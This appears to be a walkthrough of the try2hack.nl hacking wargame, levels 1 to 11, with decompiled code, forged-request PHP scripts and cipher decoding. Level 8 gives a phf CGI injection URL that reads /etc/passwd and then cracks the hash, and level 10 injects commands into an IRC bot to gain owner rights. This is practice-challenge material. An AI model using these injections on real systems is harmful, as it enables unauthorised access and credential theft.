try2hack.nl Walkthrough

Level 1

Rightclick on the page and click view-source or just ctrl+u. There you can see a javascript:

You can easy see that the password is 'h4x0r'

Level 2

Right click are disabled here, so just click ctrl+u to view the source. There you will see that a flash file are included:

View the source of the flash file by entering this in the address bar in your browser: view-source:http://try2hack.nl/levels/level2.swf
There you will see the username and password among the mess.

txtUsername
try2hack
txtPassword
irtehh4x0r!

Level 3

You will get an annoying prompt that disables you to view the source with right click and ctrl+u.
Just click on it and stop the browser before you get transfered to disneyland!
View the source directly with: view-source:http://try2hack.nl/levels/level3-.xhtml The Javascript you will find is:

      pwd = prompt("Please enter the password for level 3:","");
      if (pwd==PASSWORD){
        alert("Allright!\nEntering Level 4 ...");
        location.href = CORRECTSITE;
      }
      else {
        alert("WRONG!\nBack to disneyland !!!");
        location.href = WRONGSITE;
      }
      PASSWORD="AbCdE";
      CORRECTSITE="level4-sfvfxc.xhtml";
      WRONGSITE="http://www.disney.com";

Nevermind that Javascript you see there, its fake, but check out that external Javascript that is camouflaged right over it:

<script src="JavaScript"></script>

Lets check it out: view-source:http://try2hack.nl/levels/JavaScript

PASSWORD = "try2hackrawks";
CORRECTSITE = "level4-kdnvxs.xhtml";
WRONGSITE = "http://www.disney.com";

There you go!

Level 4

As you see in the source, the file you need to check out is http://try2hack.nl/levels/PasswdLevel4.class.
Get a Java decompiler, I recommend Cavaj which you may find here: http://www.bysoft.se/sureshot/cavaj
Use Cavaj to decompile the class and check out the source:

import java.applet.Applet;
import java.applet.AppletContext;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.*;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.EventObject;

public class PasswdLevel4 extends Applet
    implements ActionListener
{

    private URL finalurl;
    String infile;
    String inuser[];
    int totno;
    InputStream countConn;
    BufferedReader countData;
    URL inURL;
    TextField txtlogin;
    Label label1;
    Label label2;
    Label label3;
    TextField txtpass;
    Label lblstatus;
    Button ButOk;
    Button ButReset;
    Label lbltitle;

    public PasswdLevel4()
    {
        inuser = new String[22];
        totno = 0;
        countConn = null;
        countData = null;
        inURL = null;
        txtlogin = new TextField();
        label1 = new Label();
        label2 = new Label();
        label3 = new Label();
        txtpass = new TextField();
        lblstatus = new Label();
        ButOk = new Button();
        ButReset = new Button();
        lbltitle = new Label();
    }

    void ButOk_ActionPerformed(ActionEvent actionevent)
    {
        boolean flag = false;
        for(int i = 1; i <= totno / 2; i++)
        {
            if(txtlogin.getText().trim().toUpperCase().intern() == inuser[2 * (i - 1) + 2].trim().toUpperCase().intern() && txtpass.getText().trim().toUpperCase().intern() == inuser[2 * (i - 1) + 3].trim().toUpperCase().intern())
            {
                lblstatus.setText("Login Success, Loading..");
                flag = true;
                String s = inuser[1].trim().intern();
                String s1 = getParameter("targetframe");
                if(s1 == null)
                {
                    s1 = "_self";
                }
                try
                {
                    finalurl = new URL(getCodeBase(), s);
                }
                catch(MalformedURLException _ex)
                {
                    lblstatus.setText("Bad URL");
                }
                getAppletContext().showDocument(finalurl, s1);
            }
        }

        if(!flag)
        {
            lblstatus.setText("Invaild Login or Password");
        }
    }

    void ButReset_ActionPerformed(ActionEvent actionevent)
    {
        txtlogin.setText("");
        txtpass.setText("");
    }

    public void actionPerformed(ActionEvent actionevent)
    {
        Object obj = actionevent.getSource();
        if(obj == ButOk)
        {
            ButOk_ActionPerformed(actionevent);
            return;
        }
        if(obj == ButReset)
        {
            ButReset_ActionPerformed(actionevent);
        }
    }

    public void destroy()
    {
        ButOk.setEnabled(false);
        ButReset.setEnabled(false);
        txtlogin.setVisible(false);
        txtpass.setVisible(false);
    }

    public void inFile()
    {
        new StringBuffer();
        try
        {
            countConn = inURL.openStream();
            countData = new BufferedReader(new InputStreamReader(countConn));
            String s;
            while((s = countData.readLine()) != null) 
            {
                if(totno < 21)
                {
                    totno = totno + 1;
                    inuser[totno] = s;
                    s = "";
                } else
                {
                    lblstatus.setText("Cannot Exceed 10 users, Applet fail start!");
                    destroy();
                }
            }
        }
        catch(IOException ioexception)
        {
            getAppletContext().showStatus("IO Error:" + ioexception.getMessage());
        }
        try
        {
            countConn.close();
            countData.close();
            return;
        }
        catch(IOException ioexception1)
        {
            getAppletContext().showStatus("IO Error:" + ioexception1.getMessage());
        }
    }

    public void init()
    {
        setLayout(null);
        setSize(361, 191);
        add(txtlogin);
        txtlogin.setBounds(156, 72, 132, 24);
        label1.setText("Please Enter Login Name & Password");
        label1.setAlignment(1);
        add(label1);
        label1.setFont(new Font("Dialog", 1, 12));
        label1.setBounds(41, 36, 280, 24);
        label2.setText("Login");
        add(label2);
        label2.setFont(new Font("Dialog", 1, 12));
        label2.setBounds(75, 72, 36, 24);
        label3.setText("Password");
        add(label3);
        add(txtpass);
        txtpass.setEchoChar('*');
        txtpass.setBounds(156, 108, 132, 24);
        lblstatus.setAlignment(1);
        label3.setFont(new Font("Dialog", 1, 12));
        label3.setBounds(75, 108, 57, 21);
        add(lblstatus);
        lblstatus.setFont(new Font("Dialog", 1, 12));
        lblstatus.setBounds(14, 132, 344, 24);
        ButOk.setLabel("OK");
        add(ButOk);
        ButOk.setFont(new Font("Dialog", 1, 12));
        ButOk.setBounds(105, 156, 59, 23);
        ButReset.setLabel("Reset");
        add(ButReset);
        ButReset.setFont(new Font("Dialog", 1, 12));
        ButReset.setBounds(204, 156, 59, 23);
        lbltitle.setAlignment(1);
        add(lbltitle);
        lbltitle.setFont(new Font("Dialog", 1, 12));
        lbltitle.setBounds(12, 14, 336, 24);
        String s = getParameter("title");
        lbltitle.setText(s);
        ButOk.addActionListener(this);
        ButReset.addActionListener(this);
        infile = new String("level4");
        try
        {
            inURL = new URL(getCodeBase(), infile);
        }
        catch(MalformedURLException _ex)
        {
            getAppletContext().showStatus("Bad Counter URL:" + inURL);
        }
        inFile();
    }
}

Look at:

infile = new String("level4");

Thats a file being included. Lets take a look at it: view-source:http://try2hack.nl/levels/level4

level5-fdvbdf.xhtml
appletking
pieceofcake

There you have the username and password.

Level 5

Download the file zip-file and extract it.
Download vbrun300.dll from http://www.dll-files.com/dllindex/dll-files.shtml?vbrun300 and place it in the same folder as LEVEL5.EXE
Get the Dodi VB decompiler from http://vbdis4.angelfire.com

Now try to open LEVEL5.EXE, you will probably get some errors, but that's OK. Now you will find some new files in you level5 folder.
The important files are LEVEL5.bas and main.txt

main.txt:

Global Const gc0006 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}<\/>"
Global Const gc000A = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"

LEVEL5.bas:

If  edtUsername = Mid(gc0006, 56, 1) & Mid(gc0006, 28, 1) &
                  Mid(gc0006, 35, 1) & Mid(gc0006, 3, 1) & 
                  Mid(gc0006, 44, 1) & Mid(gc0006, 11, 1) & 
                  Mid(gc0006, 13, 1) & Mid(gc0006, 21, 1) Then
    If  edtPassword = Mid(gc0006, 45, 1) & Mid(gc0006, 48, 1) & 
                      Mid(gc0006, 25, 1) & Mid(gc0006, 32, 1) & 
                      Mid(gc0006, 15, 1) & Mid(gc0006, 40, 1) & 
                      Mid(gc0006, 25, 1) & Mid(gc0006, 14, 1) & 
                      Mid(gc0006, 19, 1) Then
        MsgBox "Level 6 can be found at: " & 
            Left$(gc000A, 37) & Mid(gc0006, 21, 1) & 
            Mid(gc0006, 14, 1) & Mid(gc0006, 29, 1) & 
            Mid(gc0006, 32, 1) & Mid(gc0006, 12, 1) & 
            Mid(gc0006, 14, 1) & Mid(gc000A, 44, 6), 0, "Horray!"
    End
  End If
End If

You should see that the username and password are made from the constant gc0006 in main.txt (don't get fooled by gc000A).
The 2. parameter in Mid() is the position of the character in gc0006.
I made a JavaScript to print out the username, password and the url to level6:

var a = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}<\/>";
var b = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"

document.write("Username: " + 
                a.substring(55,56) +  a.substring(27,28) + a.substring(34,35) + a.substring(2,3) + 
                a.substring(43,44) + a.substring(10,11) + a.substring(12,13) + a.substring(20,21) + "\n"); 
document.write("Password: " + 
                a.substring(44,45) + a.substring(47,48) + a.substring(24,25) + a.substring(31,32) + 
                a.substring(14,15) + a.substring(39,40) + a.substring(24,25) + a.substring(13,14) + 
                a.substring(18,19) + "\n");
document.write("Level 6 can be found at: "+ 
                b.substring(36,37) + a.substring(20,21) + a.substring(13,14) + a.substring(28,29) + 
                a.substring(31,32) + a.substring(11,12) + a.substring(13,14) + b.substring(43,44) + 
                " Horray!");

You can see the script in action here

Level 6

Download and install Wireshark (you will find it easily on google) or any other packet sniffer. Start capturing.
Now open LEVEL6.EXE and type a random username and password. Now you will se that you got some packages in Wireshark.
One of them contain this data:

(ENCRYPTION TYPE)
B*C*N**N

(USERNAME)
aaabb aaaaa aaaab abbab ababb aaaab

(PASSWORD)
aabaa abbaa aaaba baaaa babba abbba baaba abaaa abbab abbaa baaaa aaaaa babaa abaab baaab

(PAGE)
babab aabab abaab abbab aabbb aaaba

I googled B*C*N**N and found Baconian Cipher encryption.
Then I made this php script:

$x = array('aaaaa', 'aaaab', 'aaaba', 'aaabb', 'aabaa', 'aabab', 'aabba', 'aabbb', 'abaaa', 
           'abaaa', 'abaab', 'ababa', 'ababb', 'abbaa', 'abbab', 'abbba', 'abbbb', 'baaaa', 
           'baaab', 'baaba', 'baabb', 'baabb', 'babaa', 'babab', 'babba', 'babbb');

$y = range('a','z');

$s  = "Username:aaabb aaaaa aaaab abbab ababb aaaab" . "\n";
$s .= "Password:aabaa abbaa aaaba baaaa babba abbba baaba abaaa abbab abbaa baaaa aaaaa babaa abaab baaab" . "\n";
$s .= "url:babab aabab abaab abbab aabbb aaaba";

$s = str_replace($x, $y, $s);
$s = str_replace(' ', '', $s);
print $s;

You can try the script here

Level 7

After I figured out that this level was broken, it was quite easy. The server first require that you use IE 7.66.
I made a php script which sends a HTTP request where I set the user-agent to meet the requirements.
Then the server complains about not using Unix or Linux, and so it wants you to be refered from a microsoft site.
When the server is happy it gives you the URL to level 8.

This is the php script I made:

if (!$socket = fsockopen('try2hack.nl', 80, $errno, $errstr, 20)) {
    print $errno . "-" . $errstr;
} 
else {
    $out = "GET /levels/level7-xfkohc.php HTTP/1.1\r\n";
    $out .= "Host: try2hack.nl\r\n";
    $out .= "User-Agent: Mozilla/4.0 (compatible;MSIE 7.66;Linux)\r\n";
    $out .= "Referer: http://www.microsoft.com/ms.htm\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($socket, $out);
    while (!feof($socket)) {
        print fgets($socket, 2046);
    }
    fclose($socket);
}

You can try the script here

Level 8

I googled cgi + phf and found http://insecure.org/sploits/phf-cgi.html which gave me this old phf exploit:
http://try2hack.nl/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd
Now you see the root account and the encrypted password.
Then store the passwd file on your computer and use the classic John the Ripper program to crack it:

root:arse :)

Level 9

I tried to get some header information by sending a GET request like I did in Level 7.
I then noticed some cookies being set:

Set-Cookie: str_username=admin
Set-Cookie: str_password=yu0aertehbomb
Set-Cookie: auth=no

Sending a POST request with the login-data and setting the cookie auth to 'yes' seemed to do the trick:

if (!$socket = fsockopen('try2hack.nl', 80, $errno, $errstr, 20)) {
    print $errno . "-" . $errstr . "\n";
} 
else {
    $out  = "POST /levels/level9-gnapei.xhtml HTTP/1.1\r\n";
    $out .= "Host: try2hack.nl\r\n";
    $out .= "Connection: close\r\n";
    $out .= "Cookie: auth=yes; str_username=admin; str_password=yu0aertehbomb;\r\n";
    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $out .= "Content-Length: 50\r\n\r\n";
    $out .= "username=admin&password=yu0aertehbomb&submit=Enter";
    fwrite($socket, $out);
    while (!feof($socket)) {
        print fgets($socket, 2046);
    }
    fclose($socket);
}

Click here to run the script.

Level 10

After you have done level 9 you get an IRC channel name and password. After joining you receive a binary welcome message.
Just go to my favorite binary encoding/decoding site http://www.nickciske.com/tools/binary.php and decode it.
As you can see, you get a command that you must write to the bot to show you the bug.
It looked like a script, but the characters were all messed up, so thought this was rot13, which replaces all chars with the char 13 places to the right in the alphabet.
So the only thing I needed was to rot13 it again (26 chars in the alphabet. 13+13):

print str_rot13('ovaq pgpe - CVAT pgpe:cvatercyl
cebp pgpe:cvatercyl {avpx hubfg unaq qrfg xrl net} {
frg qhe [rkce [havkgvzr] - $net]
chgfrei "ABGVPR $avpx :Lbhe cvat ercyl gbbx $qhe frpbaqf"}');

which transforms to:

bind ctcr - PING ctcr:pingreply
proc ctcr:pingreply {nick uhost hand dest key arg} {
    set dur [expr [unixtime] - $arg]
    putserv "NOTICE $nick :Your ping reply took $dur seconds"}

After almost 24 hours, x number cups of coffee, trying and failing, hours googling and reading on eggdrop I finally made it!
The argument sent with the ping are in most irc clients a timestamp, but you can send what you want.
The bot lacks of security, it doesn't check $arg for bad code. Time to exploit.
I tried sending raw data with the /quote command but that didn't work.
I then come across the /nctcp command in Irssi (/ctcpreply for mIRC) which I noticed sent some stuff along with the data that seemed to make a diffrence.
I think it was some UTF \x00\x01 thing:

Worked:

/nctcp LEVEL10-xxx PING [adduser yournick *!yourident@*]
/nctcp LEVEL10-xxx PING [chattr yournick +n]

I changed the password for the bot to '123456' by doing:

/msg LEVEL10-xxx pass 123456

Then start a dcc chat with the bot:

/dcc chat LEVEL10-xxx

The bot will msg you with the URL to level 11.

Level 11

This PHP script seemed to work nice:

$url = "http://www.try2hack.nl/levels/level11-vmituh.xhtml";
$html = file_get_contents($url);
$x = 1;
if (preg_match("/positions\s(.*?)\sand\s(\d+)\s/", $html, $m )) {
   $pos = explode(',', trim($m[1]));
   $pos[] = trim($m[2]);
}
if (preg_match("/:
(.*?)/", $html, $m )) {
    $string = trim($m[1]);
}
foreach ($pos as $key => $value) {
   $x = bcmul($x, ord($string[$value - 1]));
}
$postvalue =  substr($x, 0, 5);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'answer=' . $postvalue . '&submit=click here to continue');
$response = curl_exec($ch);
curl_close($ch);
print preg_replace('/.*?\s+(.*?.)?
Run the script here